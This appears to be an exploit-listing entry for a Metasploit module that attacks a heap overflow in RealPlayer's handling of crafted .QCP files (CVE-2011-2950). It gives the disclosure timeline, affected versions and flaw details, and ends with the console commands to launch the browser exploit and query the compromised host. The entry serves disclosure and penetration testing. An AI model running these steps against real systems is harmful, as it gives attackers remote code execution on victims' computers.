Timeline :

Vulnerability discovered by Sean de Regge and submitted to ZDI
Vulnerability reported to vendor by ZDI the 2011-04-01
Coordinated public release of the vulnerability the 2011-08-16
Metasploit PoC provided the 2011-09-16

PoC provided by :

Sean de Regge
juan vazquez

Reference(s) :

CVE-2011-2950
ZDI-11-265
OSVDB-74549

Affected version(s) :

RealPlayer 11.0 – 11.1
RealPlayer SP 1.0 – 1.1.5
RealPlayer 14.0.0 – 14.0.5

Tested on Windows XP SP3 with :

Internet Explorer 7.0.5730.13
Apple RealPlayer 14.0.2.633

Description :

This module exploits a heap overflow in Realplayer when handling a .QCP file. The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is allocated on the heap and user-supplied data from the file is copied within a memory copy loop. This allows a remote attacker to execute arbitrary code running in the context of the web browser via a .QCP file with a specially crafted “fmt” chunk. At this moment this module exploits the flaw on Windows XP IE6, IE7.

Commands :

use exploit/windows/browser/realplayer_qcp
set SRVHOST 192.168.178.21
exploit
getuid
sysinfo